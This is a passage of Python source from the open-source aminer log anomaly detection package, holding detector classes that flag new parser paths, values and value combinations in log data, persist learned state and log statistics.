@return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False id_match_element = None for id_path in self.id_path_list: # Get the id value and return if not found in this log atom. id_match_element = match_dict.get(id_path) if id_match_element is not None: break if id_match_element is None: return False timestamp = log_atom.get_timestamp() if timestamp is not None: if self.next_shift_time is None: self.next_shift_time = timestamp + self.min_allowed_time_diff if timestamp > self.next_shift_time: # Every min_allowed_time_diff seconds, process all combinations from id_dict_old and then override id_dict_old with # id_dict_current. This guarantees that incomplete combos are hold for at least min_allowed_time_diff seconds before # proceeding. 
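self.next_shift_time = timestamp + self.min_allowed_time_diff
                if self.allow_missing_values_flag:
                    for id_old in self.id_dict_old:
                        self.process_id_dict_entry(self.id_dict_old[id_old], log_atom)
                self.id_dict_old = self.id_dict_current
                self.id_dict_current = {}
        # A list of id match elements is keyed by the tuple of their match objects so it stays hashable.
        if isinstance(id_match_element, list):
            id_match_object = []
            for match_element in id_match_element:
                id_match_object.append(match_element.match_object)
            id_match_object = tuple(id_match_object)
        else:
            id_match_object = id_match_element.match_object
        # Find dictionary containing id and create ref to old or current dict (side effects)
        id_dict = None
        if id_match_object in self.id_dict_current:
            id_dict = self.id_dict_current
        elif id_match_object in self.id_dict_old:
            id_dict = self.id_dict_old
        else:
            id_dict = self.id_dict_current
            id_dict[id_match_object] = {}
        for target_path in self.target_path_list:
            # Append values to the combo.
            match_element = match_dict.get(target_path)
            if match_element is not None:
                if isinstance(match_element, list):
                    values = []
                    matches = match_element
                    for match_element in matches:
                        if isinstance(match_element.match_object, bytes):
                            values.append(match_element.match_object.decode(AminerConfig.ENCODING))
                        else:
                            # Fix: the non-bytes branch previously read back id_dict[id_match_object][target_path], which is
                            # not yet set for a fresh combo (KeyError) and never the element's own value.
                            values.append(match_element.match_object)
                    id_dict[id_match_object][target_path] = values
                else:
                    if isinstance(match_element.match_object, bytes):
                        id_dict[id_match_object][target_path] = match_element.match_object.decode(AminerConfig.ENCODING)
                    else:
                        id_dict[id_match_object][target_path] = match_element.match_object
        if len(id_dict[id_match_object]) == len(self.target_path_list):
            # Found value for all target paths. No need to wait more.
            self.process_id_dict_entry(id_dict[id_match_object], log_atom)
            del id_dict[id_match_object]
        self.log_success += 1
        return True

    def process_id_dict_entry(self, id_dict_entry, log_atom):
        """
        Process an entry from the id_dict.

        Unknown combinations are reported to all anomaly_event_handlers and, in learn_mode, appended to known_values.
        @param id_dict_entry dictionary mapping each collected target path to its value.
        @param log_atom the atom that completed (or flushed) the combination; used for the output log line.
        """
        if id_dict_entry not in self.known_values:
            # Combo is unknown, process and raise anomaly
            if self.learn_mode:
                self.known_values.append(id_dict_entry)
                self.log_learned_path_value_combos += 1
                self.log_new_learned_values.append(id_dict_entry)
                if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
            analysis_component = {'AffectedLogAtomValues': [str(i) for i in list(id_dict_entry.values())]}
            event_data = {'AnalysisComponent': analysis_component}
            # Raw log data may not be valid in the configured encoding; show repr() rather than fail.
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                data = repr(log_atom.raw_data)
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            if self.output_logline:
                sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + repr(
                    id_dict_entry) + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [repr(id_dict_entry) + os.linesep + original_log_line_prefix + data]
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value combination(s) detected', sorted_log_lines,
                                       event_data, log_atom, self)

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time the timer fired.
        @return seconds until the next call is due; the configured persistence period when nothing is scheduled yet.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, self.known_values)
        # Fix: the class name is a str, so "%d" raised a formatting error inside logging on every persist.
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must equal 'Analysis.<class name>' of this detector.
        @param event_data the combination (dictionary) to add to known_values.
        @param allowlisting_data must be None; this detector takes no extra allowlisting data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.known_values:
            self.known_values.append(event_data)
        return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}."

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler.

        Override this method for more sophisticated statistics output of the AtomHandler.
        The counters are reset after each call.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_path_value_combos)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes. 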
Following" " new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] NewMatchPathDetector.py000066400000000000000000000211631437606560100353450ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for new data paths. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class NewMatchPathDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when new data path was found in a parsed atom.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id='Default', learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode specifies whether new values should be learned. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.log_learned_paths = 0 self.log_new_learned_paths = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is None: self.known_path_set = set() else: self.known_path_set = set(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, the caller may decide if it makes sense passing the parsed atom also to other handlers. 
"""
        self.log_total += 1
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        unseen_paths = self._collect_unknown_paths(log_atom)
        if unseen_paths:
            self._report_unknown_paths(unseen_paths, log_atom)
        self.log_success += 1
        return True

    def _collect_unknown_paths(self, log_atom):
        """
        Return the parser paths of log_atom not yet in known_path_set, in match dictionary order.

        In learn_mode every such path is added to known_path_set and counted for the statistics; the
        stop_learning_timestamp is pushed out when stop_learning_no_anomaly_time is configured.
        """
        unseen_paths = []
        for parser_path in log_atom.parser_match.get_match_dictionary().keys():
            if parser_path in self.known_path_set:
                continue
            unseen_paths.append(parser_path)
            if not self.learn_mode:
                continue
            self.known_path_set.add(parser_path)
            self.log_learned_paths += 1
            self.log_new_learned_paths.append(parser_path)
            if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
        return unseen_paths

    def _report_unknown_paths(self, unseen_paths, log_atom):
        """Dispatch one 'New path(es) detected' event for unseen_paths to every anomaly event handler."""
        line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
        # Raw log data that is not valid in the configured encoding is shown via repr() instead of failing.
        try:
            data = log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            data = repr(log_atom.raw_data)
        rendered = repr(unseen_paths) + os.linesep + line_prefix + data
        if self.output_logline:
            rendered = log_atom.parser_match.match_element.annotate_match('') + os.linesep + rendered
        event_data = {'AnalysisComponent': {'AffectedLogAtomPaths': list(unseen_paths)}}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New path(es) detected', [rendered],
                                   event_data, log_atom, self)

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted."""
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD,
DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, list(self.known_path_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.known_path_set.add(event_data) return f'Allowlisted path(es) {event_data} in {event_type}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_paths) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes. 
Following new paths" " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_paths, self.log_new_learned_paths) self.log_success = 0 self.log_total = 0 self.log_learned_paths = 0 self.log_new_learned_paths = [] NewMatchPathValueComboDetector.py000066400000000000000000000303231437606560100373200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file defines the basic NewMatchPathValueComboDetector detector. It extracts values from LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
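"""
import time
import os
import logging
from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class NewMatchPathValueComboDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """
    Create events when a new combination of values for a given list of parser paths is found.

    For every log atom the values found at target_path_list are collected into a tuple and compared with the set of known
    combinations. Unknown tuples are reported to all anomaly_event_handlers; in learn_mode they are also added to the known set,
    which is persisted periodically (do_timer) and on demand (do_persist).
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', allow_missing_values_flag=False,
                 learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from
               target_path_list does not refer to an existing parsed data object (None is stored in its place).
        @param learn_mode when set to True, this detector will report a new value only the first time before including it in the
               known values set automatically.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue; the base class initializes these from the arguments.
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode,
            output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )
        # Counters for log_statistics(); they are reset after every statistics report.
        self.log_learned_path_value_combos = 0
        self.log_new_learned_values = []
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        self.known_values_set = set()
        self.load_persistence_data()
        PersistenceUtil.add_persistable_component(self)

    def load_persistence_data(self):
        """
        Load the known value combinations from the persistence file, replacing the current set.

        Nothing is changed when no persistence data is available (load_json returned None).
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # Set and tuples were stored as list of lists. Transform the inner lists to tuples to allow hash operation needed by set.
            self.known_values_set = {tuple(record) for record in persistence_data}
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def receive_atom(self, log_atom):
        """
        Receive one parsed atom and check the combination of values at target_path_list against the known combinations.

        A path that maps to a list of match elements contributes every element's value to the combination, so the tuple may be
        longer than target_path_list. Unknown combinations are reported to the anomaly_event_handlers and, in learn_mode, learned.
        The raw log line is only attached to the event when output_logline is set.
        @return True if a value combination was extracted and checked against the list of known combinations, no matter if the
                checked values were new or not; False if a path had no match and allow_missing_values_flag is not set.
        """
        self.log_total += 1
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        match_dict = log_atom.parser_match.get_match_dictionary()
        match_value_list = []
        for target_path in self.target_path_list:
            match_element = match_dict.get(target_path)
            if match_element is None:
                if not self.allow_missing_values_flag:
                    return False
                match_value_list.append(None)
            else:
                matches = match_element if isinstance(match_element, list) else [match_element]
                for element in matches:
                    match_value_list.append(element.match_object)

        match_value_tuple = tuple(match_value_list)
        affected_log_atom_values = []
        for match_value in match_value_list:
            if isinstance(match_value, bytes):
                match_value = match_value.decode(AminerConfig.ENCODING)
            affected_log_atom_values.append(str(match_value))

        if match_value_tuple not in self.known_values_set:
            if self.learn_mode:
                self.known_values_set.add(match_value_tuple)
                self.log_learned_path_value_combos += 1
                self.log_new_learned_values.append(match_value_tuple)
                # Every learned combination postpones the "no anomaly" learning stop.
                if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
            analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': affected_log_atom_values}
            event_data = {'AnalysisComponent': analysis_component}
            if self.output_logline:
                try:
                    data = log_atom.raw_data.decode(AminerConfig.ENCODING)
                except UnicodeError:
                    data = repr(log_atom.raw_data)
                original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                sorted_log_lines = [str(match_value_tuple) + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [str(match_value_tuple)]
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value combination(s) detected', sorted_log_lines,
                                       event_data, log_atom, self)
        self.log_success += 1
        return True

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time the timer was triggered with.
        @return the number of seconds until the next persistence is due. When no persistence time has been scheduled yet
                (next_persist_time is None), the configured persistence period is returned.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            # The next run is scheduled from the wall clock, not from trigger_time.
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, list(self.known_values_set))
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must be the event type emitted by this detector, i.e. 'Analysis.<class name>'.
        @param event_data the value combination to allowlist, given as list or tuple in the same order receive_atom extracts it.
               Lists are converted to tuples because only tuples are hashable and comparable with the learned combinations.
        @param allowlisting_data must be None; this detector does not understand additional allowlisting data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # NOTE(review): event_data presumably arrives from an operator (e.g. the remote control interface). A bare string or other
        # scalar would be silently added as a combination that can never match, and a list would raise a TypeError from set.add();
        # reject anything that is not a sequence explicitly instead.
        if not isinstance(event_data, (list, tuple)):
            msg = 'Event_data has the wrong format.' \
                  'The supported format is [value_1, value_2, ..., value_n] where n is the number of analyzed values.'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        self.known_values_set.add(tuple(event_data))
        return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}."

    def add_to_persistency_event(self, event_type, event_data):
        """
        Add the value combination in event_data to the known combinations, so it becomes part of the next persisted state.

        @param event_type must be the event type emitted by this detector, i.e. 'Analysis.<class name>'.
        @param event_data list [value_1, ..., value_n] with exactly one str per entry of target_path_list; an entry may be None
               only when allow_missing_values_flag is set. Values are stored UTF-8 encoded to match what receive_atom extracts.
        @return a message with information about the addition to the persistence.
        @throws Exception when the event is not from this source or event_data does not have the expected format.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        format_msg = 'Event_data has the wrong format.' \
                     'The supported format is [value_1, value_2, ..., value_n] where n is the number of analyzed paths.'
        if not isinstance(event_data, list) or len(event_data) != len(self.target_path_list):
            logging.getLogger(DEBUG_LOG_NAME).error(format_msg)
            raise Exception(format_msg)
        match_value_list = []
        for match_element in event_data:
            if match_element is None:
                if not self.allow_missing_values_flag:
                    msg = 'Empty entry detected in event_data.' \
                          'Please fill entry or set parameter allow_missing_values_flag to true.'
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise Exception(msg)
                match_value_list.append(None)
            elif not isinstance(match_element, str):
                # bytes(x, 'utf-8') only accepts str; report other types as a format error instead of a bare TypeError.
                logging.getLogger(DEBUG_LOG_NAME).error(format_msg)
                raise Exception(format_msg)
            else:
                match_value_list.append(bytes(match_element, 'utf-8'))
        match_value_tuple = tuple(match_value_list)
        if match_value_tuple not in self.known_values_set:
            self.known_values_set.add(match_value_tuple)
            self.log_learned_path_value_combos += 1
            self.log_new_learned_values.append(match_value_tuple)
        # str() is needed because event_data may legitimately contain None, which str.join() rejects.
        return f"Added values [{', '.join(str(value) for value in event_data)}] of paths [{', '.join(self.target_path_list)}] " \
               f"to the persistence."

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        All counters are reset after the report was written.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_path_value_combos)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes."
                " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total,
                self.log_learned_path_value_combos, self.log_new_learned_values)
        self.log_success = 0
        self.log_total = 0
        self.log_learned_path_value_combos = 0
        self.log_new_learned_values = []
NewMatchPathValueDetector.py000066400000000000000000000233121437606560100363400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module defines a detector for new values in a data path.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .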
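"""
import time
import os
import logging
from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class NewMatchPathValueDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """
    Create events when new values for a given data path are found.

    Values of all paths in target_path_list share one set of known values. Unknown values are reported per path to the
    anomaly_event_handlers and, in learn_mode, added to the known set, which is persisted periodically (do_timer) and on demand
    (do_persist).
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', learn_mode=False,
                 output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param learn_mode when set to True, this detector will report a new value only the first time before including it in the
               known values set automatically.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue; the base class initializes these from the arguments.
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )
        # Counters for log_statistics(); they are reset after every statistics report.
        self.log_learned_path_values = 0
        self.log_new_learned_values = []
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.known_values_set = set()
        self.load_persistence_data()

    def load_persistence_data(self):
        """
        Load the known values from the persistence file, replacing the current set.

        Nothing is changed when no persistence data is available (load_json returned None). Split out of __init__ to mirror
        NewMatchPathValueComboDetector.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            self.known_values_set = set(persistence_data)
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source and report every unknown value found at one of the target paths.

        One event per target path is generated, listing only the values of that path that were not known before. In learn_mode
        those values are added to the known set before the event is emitted. The raw log line is only attached to the event
        when output_logline is set. Paths without a match are skipped silently.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        for target_path in self.target_path_list:
            match_element = match_dict.get(target_path)
            if match_element is None:
                continue
            # A path may map to a list of match elements (repeated element); every element is checked on its own.
            is_list_match = isinstance(match_element, list)
            matches = match_element if is_list_match else [match_element]
            affected_log_atom_values = []
            for match in matches:
                if match.match_object in self.known_values_set:
                    continue
                if self.learn_mode:
                    self.known_values_set.add(match.match_object)
                    self.log_learned_path_values += 1
                    self.log_new_learned_values.append(match.match_object)
                    # Every learned value postpones the "no anomaly" learning stop.
                    if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                        self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
                if isinstance(match.match_object, bytes):
                    affected_log_atom_values.append(match.match_object.decode(AminerConfig.ENCODING))
                else:
                    affected_log_atom_values.append(str(match.match_object))

            if len(affected_log_atom_values) > 0:
                analysis_component = {'AffectedLogAtomPaths': [target_path], 'AffectedLogAtomValues': affected_log_atom_values}
                if is_list_match:
                    res = {target_path: affected_log_atom_values}
                else:
                    res = {target_path: match_element.match_object}
                    if isinstance(res[target_path], bytes):
                        res[target_path] = res[target_path].decode(AminerConfig.ENCODING)
                if self.output_logline:
                    try:
                        data = log_atom.raw_data.decode(AminerConfig.ENCODING)
                    except UnicodeError:
                        data = repr(log_atom.raw_data)
                    original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                    sorted_log_lines = [str(res) + os.linesep + original_log_line_prefix + data]
                else:
                    sorted_log_lines = [str(res)]
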